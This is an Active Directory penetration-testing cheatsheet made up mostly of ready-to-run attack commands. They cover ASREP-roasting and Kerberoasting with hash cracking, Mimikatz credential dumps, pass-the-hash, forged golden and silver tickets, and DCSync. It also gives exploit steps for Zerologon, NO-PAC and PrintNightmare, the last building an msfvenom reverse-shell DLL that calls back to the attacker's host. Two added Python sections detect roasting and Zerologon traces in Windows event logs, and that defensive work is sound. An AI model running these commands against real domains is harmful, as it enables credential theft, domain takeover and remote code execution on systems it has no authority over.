

Pentesting Active Directory

This is a cheatsheet of tools and commands that I use to pentest Active Directory. It includes Windows, Impacket and PowerView commands, how to use Bloodhound and popular exploits such as Zerologon and NO-PAC.


Enumeration

Initial system enumeration

See local accounts

net user

See all of the accounts in the domain

net user /domain

Check if an account is a Domain Admin

net user <account-name> /domain

See groups in the AD domain

net group /domain

Sync the clock with the DC (Domain Controller).

ntpdate <dc-ip>

Powerview

. .\PowerView.ps1

Information about the domain

Get-NetDomain

Get-NetDomainController

Get-DomainPolicy

See password rules

(Get-DomainPolicy)."system access"

Information about users. Look for passwords or personal information in the description field.

Get-NetUser

Get-NetUser | select cn

Get-NetUser | select description

Get-NetUser | select samaccountname

Get-UserProperty -Properties pwdlastset

Get-UserProperty -Properties logoncount

Information about computers

Get-NetComputer

Get-NetComputer -FullData

Get-NetGroup

Get-NetGroup -GroupName <group-name>

Get-NetGroup -GroupName "Domain Admins"

Get-NetGroupMember -GroupName "Domain Admins"

See SMB shares

Invoke-ShareFinder


Crackmapexec

A few quick commands that I always use if I have no information about the machine

crackmapexec smb <ip>

crackmapexec smb <ip> -u '' -p ''

crackmapexec smb <ip> -u 'guest' -p ''


Exploitation

ASREP-Roasting

With a list of valid usernames and no passwords, you can check which accounts have Kerberos pre-authentication disabled by ASREP-Roasting them

impacket-GetNPUsers <domain>/ -usersfile <users-list> -format john -dc-ip <dc-ip>

or

python3 GetNPUsers.py <domain>/<user> -no-pass -dc-ip <dc-ip>

To crack obtained hashes, save them in a file and give it to John. I usually use rockyou.txt to brute-force the passwords

john --wordlist=<passwords-file> <hashes-file>

Alternative

hashcat -m 18200 -a 0 <hashes-file> <passwords-file>

If you obtained any passwords, check them

crackmapexec smb <ip> -u <user> -p <password>

If they are valid, further enumerate the domain

crackmapexec smb <ip> -u <user> -p <password> --shares

crackmapexec smb <ip> -u <user> -p <password> --rid-brute

crackmapexec smb <ip> -u <user> -p <password> --users

crackmapexec smb <ip> -u <user> -p <password> --lsa

Try to connect using Windows Remote Management

crackmapexec winrm <ip> -u <user> -p <password>

Try to connect using pass-the-hash (the user needs to have administrative rights)

pth-winexe -U <domain>/<user>%<lm-hash>:<ntlm-hash> //<ip> cmd


Kerberoasting

Two different ways to perform this attack.

  1. From your attacking machine, using Impacket

    impacket-GetUserSPNs -dc-ip <ip> <domain>/<user>

    If that lists accounts with SPNs, request their tickets

    impacket-GetUserSPNs -dc-ip <ip> <domain>/<user> --request

    To crack the hash

    hashcat -m 13100 -a 0 <hash> <wordlist> --force

  2. On the target machine, using Mimikatz

    Generate tickets in Powershell

    Add-Type -AssemblyName System.IdentityModel

    New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '<service>/<hostname>.<domain>.com'

    klist

    In Mimikatz

    kerberos::list /export

    Grab the tickets and crack them

    python /usr/share/kerberoast/tgsrepcrack.py <wordlist> <tickets>
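
Both ASREP-Roasting and Kerberoasting leave a distinctive trace on the domain controller: a 4768 TGT issued with pre-authentication type 0, and 4769 service tickets encrypted with RC4-HMAC (type 0x17) for user accounts that hold SPNs. The following detection logic is an added example written for this cheatsheet, not code from the original page or from Impacket or Mimikatz. It assumes events arrive as dicts keyed by the Windows Security log's EventData field names (TargetUserName, ServiceName, TicketEncryptionType, PreAuthType, Status), as a SIEM export would provide them; SAMPLE_EVENTS and the threshold are constructed.

```python
# Added example: flag AS-REP roasting and Kerberoasting indicators in
# Windows Security events 4768 / 4769. Field names follow the EventData
# schema of those events; the sample events at the bottom are constructed.

RC4_HMAC = "0x17"             # TicketEncryptionType for RC4-HMAC: offline-crackable
PREAUTH_NOT_REQUIRED = "0"    # PreAuthType 0: TGT issued without pre-authentication
RC4_TGS_THRESHOLD = 3         # distinct SPN accounts per requester before alerting (assumed)


def is_asrep_roast_indicator(ev):
    """4768 TGT issued without pre-authentication and encrypted with RC4."""
    return (
        ev.get("EventID") == 4768
        and ev.get("Status") == "0x0"
        and ev.get("PreAuthType") == PREAUTH_NOT_REQUIRED
        and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
    )


def is_kerberoast_candidate(ev):
    """4769 RC4 service ticket for a user SPN account (not a machine, not krbtgt)."""
    svc = ev.get("ServiceName", "")
    return (
        ev.get("EventID") == 4769
        and ev.get("Status") == "0x0"
        and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
        and not svc.endswith("$")
        and svc.lower() != "krbtgt"
    )


def analyse(events, threshold=RC4_TGS_THRESHOLD):
    """Return (asrep_accounts, kerberoast_suspects).

    asrep_accounts: accounts whose TGT was issued without pre-auth (sorted).
    kerberoast_suspects: requester -> sorted SPN accounts for which it obtained
    RC4 service tickets, kept only once the list reaches `threshold`.
    """
    asrep = sorted({ev["TargetUserName"] for ev in events if is_asrep_roast_indicator(ev)})
    per_requester = {}
    for ev in events:
        if is_kerberoast_candidate(ev):
            per_requester.setdefault(ev["TargetUserName"], set()).add(ev["ServiceName"])
    suspects = {
        user: sorted(spns) for user, spns in per_requester.items() if len(spns) >= threshold
    }
    return asrep, suspects


def _ev(event_id, **fields):
    """Build one constructed sample event."""
    return {"EventID": event_id, "Status": "0x0", **fields}


# Constructed sample: one account roastable via AS-REP, one requester pulling
# RC4 tickets for three different service accounts, plus benign noise.
SAMPLE_EVENTS = [
    _ev(4768, TargetUserName="svc_backup", PreAuthType="0", TicketEncryptionType="0x17"),
    _ev(4768, TargetUserName="alice", PreAuthType="2", TicketEncryptionType="0x12"),
    _ev(4769, TargetUserName="alice@CORP.LOCAL", ServiceName="mssql_svc", TicketEncryptionType="0x17"),
    _ev(4769, TargetUserName="alice@CORP.LOCAL", ServiceName="http_svc", TicketEncryptionType="0x17"),
    _ev(4769, TargetUserName="alice@CORP.LOCAL", ServiceName="svc_sql", TicketEncryptionType="0x17"),
    _ev(4769, TargetUserName="alice@CORP.LOCAL", ServiceName="WEB01$", TicketEncryptionType="0x17"),
    _ev(4769, TargetUserName="alice@CORP.LOCAL", ServiceName="krbtgt", TicketEncryptionType="0x12"),
    _ev(4769, TargetUserName="bob@CORP.LOCAL", ServiceName="mssql_svc", TicketEncryptionType="0x17"),
    _ev(4769, TargetUserName="bob@CORP.LOCAL", ServiceName="http_svc", TicketEncryptionType="0x12"),
]


def run_sample():
    return analyse(SAMPLE_EVENTS)


if __name__ == "__main__":
    asrep, suspects = run_sample()
    print("AS-REP roastable accounts:", asrep)
    print("Kerberoasting suspects:", suspects)
```

Machine accounts and krbtgt are excluded because RC4 tickets for them are routine and their passwords are not crackable in practice; the remaining RC4 tickets are rare in a domain that has moved to AES, which is the mitigation side of the same observation (remove "Do not require Kerberos preauthentication", give service accounts long random passwords or gMSAs, and enable AES-only on SPN accounts).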


Mimikatz & pivoting

If you managed to get access to the machine and you are able to transfer Mimikatz, you can use the following commands.

privilege::debug

Dump credentials of all logged-in users

sekurlsa::logonpasswords

lsadump::lsa /patch

Dump the SAM database (equivalent to hashdump in a Meterpreter shell)

token::elevate

lsadump::sam

Overpass-the-hash

sekurlsa::pth /user:<username> /domain:<domain-name> /ntlm:<ntlm-hash> /run:PowerShell.exe

Pass-the-ticket (silver ticket)

Get the SID of the user (the /sid value used below is the domain SID, i.e. the user's SID without its final RID component)

whoami /user

In Mimikatz

kerberos::purge

kerberos::golden /user:<username> /domain:<domain-name> /sid:<domain-sid> /target:<target-fqdn> /service:<service> /rc4:<service-account-ntlm-hash> /ptt

If you have a silver ticket, connect using Impacket

export KRB5CCNAME=<path-to-silver-ticket>

impacket-wmiexec -k -no-pass <username>@<domain>

Golden ticket

If we obtain the krbtgt hash (the NTLM hash of the krbtgt domain account), we can forge our own golden tickets (custom TGTs).

Get the krbtgt

privilege::debug

lsadump::lsa /patch

kerberos::purge

Create a golden ticket

kerberos::golden /user:<fake-username> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt-hash> /ptt

Launch a new cmd

misc::cmd

Use PsExec to escalate privileges

psexec.exe \\<dc-name> cmd.exe

DC-SYNC

lsadump::dcsync /user:Administrator


Bloodhound and Sharphound

Bloodhound needs an ingestor (collector) that gathers data from the domain; the files it produces are then uploaded into the Bloodhound application running on your attack machine.

Bloodhound-Python

bloodhound-python -c All -u <user> -p <password> -gc '<hostname>.<domain-name>' -dc '<hostname>.<domain-name>' -d '<domain-name>' -ns <dc-ip>

Sharphound

You can use Sharphound in two ways.

  1. Transfer the .exe file (which you can download from here: https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors) on the target machine and run it with the following command

    SharpHound.exe -c All

  2. Transfer the Sharphound.ps1 Powershell script on the target machine and run it

    . .\SharpHound.ps1

    Invoke-Bloodhound -CollectionMethod All -Domain <domain-name> -ZipFileName loot.zip


Zerologon

This exploit should be used very carefully and only with the guarantee that it can be reversed. It changes the domain controller's machine-account password and interrupts communication with other computers in the domain. To test for the vulnerability without exploiting it, I used the following script: https://github.com/SecuraBV/CVE-2020-1472

python3 zerologon_tester.py <DC-name> <DC-ip>

To exploit it, you can find the Zerologon exploit here: https://github.com/dirkjanm/CVE-2020-1472, as well as restoration steps.

python3 cve-2020-1472-exploit.py <DC-name> <DC-ip>

Get all of the information (usernames + hashes)

impacket-secretsdump -just-dc <domain>/<DC-name>$@<DC-ip>

To restore

Get the lanman_hash:ntlm_hash from the output of the previous command

impacket-secretsdump administrator@<DC-ip> -hashes <lanman_hash:ntlm_hash>

Take the hex-encoded plaintext password of the DC machine account (the plain_password_hex value for <DC-name>$ in the previous command's output) and pass it to -hexpass

python3 restorepassword.py <domain>/<DC-name>@<DC-name> -target-ip <DC-ip> -hexpass <plain-password-hex>
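
The exploit and restore sequence above is visible on the domain controller even when the tester is careful: resetting the DC machine-account password through an unauthenticated Netlogon call produces event 4742 ("A computer account was changed") whose Subject is ANONYMOUS LOGON (S-1-5-7), and the restore step produces a second 4742 on the same account minutes later, whereas machine accounts normally rotate their password every 30 days. The two checks below are an added example for this cheatsheet, not code from the original page or from the linked exploit repositories. They assume dict events keyed by EventData field names (TargetUserName, SubjectUserSid, PasswordLastSet) plus an ISO 8601 TimeCreated; DC_ACCOUNTS and SAMPLE_EVENTS are constructed.

```python
# Added example: spot Zerologon (CVE-2020-1472) exploitation traces on a DC via
# event 4742. Field names follow the EventData schema; the DC account list and
# the sample events are constructed.
from datetime import datetime, timedelta

ANONYMOUS_LOGON_SID = "S-1-5-7"
DC_ACCOUNTS = {"DC01$", "DC02$"}   # constructed: the machine accounts of your DCs


def _is_dc_password_change(ev, dc_accounts):
    """4742 on a DC machine account where the password was actually set."""
    return (
        ev.get("EventID") == 4742
        and ev.get("TargetUserName") in dc_accounts
        and ev.get("PasswordLastSet", "-") != "-"   # "-" means the password was not touched
    )


def anonymous_dc_password_resets(events, dc_accounts=DC_ACCOUNTS):
    """DC machine-account password changes whose Subject is ANONYMOUS LOGON."""
    return [
        (ev["TargetUserName"], ev["TimeCreated"])
        for ev in events
        if _is_dc_password_change(ev, dc_accounts) and ev.get("SubjectUserSid") == ANONYMOUS_LOGON_SID
    ]


def rapid_dc_password_changes(events, dc_accounts=DC_ACCOUNTS, window=timedelta(minutes=30)):
    """Pairs of password changes on one DC account closer together than `window`.

    Normal rotation happens every 30 days, so a reset followed by a restore
    within minutes stands out even if the anonymous subject was not logged.
    """
    by_account = {}
    for ev in events:
        if _is_dc_password_change(ev, dc_accounts):
            by_account.setdefault(ev["TargetUserName"], []).append(
                datetime.fromisoformat(ev["TimeCreated"])
            )
    hits = []
    for account, times in by_account.items():
        times.sort()
        for earlier, later in zip(times, times[1:]):
            if later - earlier <= window:
                hits.append((account, earlier.isoformat(), later.isoformat()))
    return hits


SAMPLE_EVENTS = [  # constructed sample events
    {"EventID": 4742, "TimeCreated": "2024-05-01T10:00:00", "TargetUserName": "DC01$",   # exploit reset
     "SubjectUserSid": "S-1-5-7", "SubjectUserName": "ANONYMOUS LOGON", "PasswordLastSet": "5/1/2024 10:00:00 AM"},
    {"EventID": 4742, "TimeCreated": "2024-05-01T10:12:00", "TargetUserName": "DC01$",   # restore step
     "SubjectUserSid": "S-1-5-21-1111-2222-3333-500", "SubjectUserName": "Administrator", "PasswordLastSet": "5/1/2024 10:12:00 AM"},
    {"EventID": 4742, "TimeCreated": "2024-05-01T09:00:00", "TargetUserName": "DC02$",   # routine rotation
     "SubjectUserSid": "S-1-5-21-1111-2222-3333-1001", "SubjectUserName": "DC02$", "PasswordLastSet": "5/1/2024 9:00:00 AM"},
    {"EventID": 4742, "TimeCreated": "2024-05-01T11:00:00", "TargetUserName": "DC02$",   # attribute edit, no password
     "SubjectUserSid": "S-1-5-21-1111-2222-3333-1104", "SubjectUserName": "helpdesk", "PasswordLastSet": "-"},
]


if __name__ == "__main__":
    print("Anonymous DC password resets:", anonymous_dc_password_resets(SAMPLE_EVENTS))
    print("Rapid DC password changes:", rapid_dc_password_changes(SAMPLE_EVENTS))
```

On patched controllers the Netlogon service additionally logs events 5827 and 5828 (vulnerable secure-channel connection denied) and 5829 (vulnerable connection still allowed), which is the cleanest way to confirm that enforcement mode is on and which machines still depend on insecure RPC.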


NO-PAC (sam-the-admin)

This exploit is possible if you have any valid credentials from a user in the Active Directory. You can find the exploit here: https://github.com/WazeHell/sam-the-admin

python3 sam_the_admin.py -dc-ip <DC-ip> <domain>/<user>:<password>


PrintNightmare

You can find the exploit here: https://github.com/cube0x0/CVE-2021-1675

For this exploit, you need valid user credentials.

Check if the system is vulnerable:

rpcdump.py <target-ip> | egrep 'MS-RPRN|MS-PAR'

If you get Print System Asynchronous Remote Protocol and Print System Remote Protocol in the output, the Print Spooler is exposed over RPC and the host is likely vulnerable.

Create a .dll file to execute the reverse shell

msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 -f dll LHOST=<attacking-machine-ip> LPORT=<listener-port> > shell.dll

Start a listener on the port used in the command.

Host the file on Samba

smbserver.py share . -smb2support

python3 CVE-2021-1675.py <domain>/<user>:<password>@<target-ip> '\\<attacking-machine-ip>\share\shell.dll'


Other cheatsheets

Some cheatsheets that I've used in the past and I've found very useful are:

https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet

https://gist.github.com/Rajchowdhury420/da4d12a3db13aa5232fcd4e7d96ec6a1

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

Contributors: sabrinalupsan
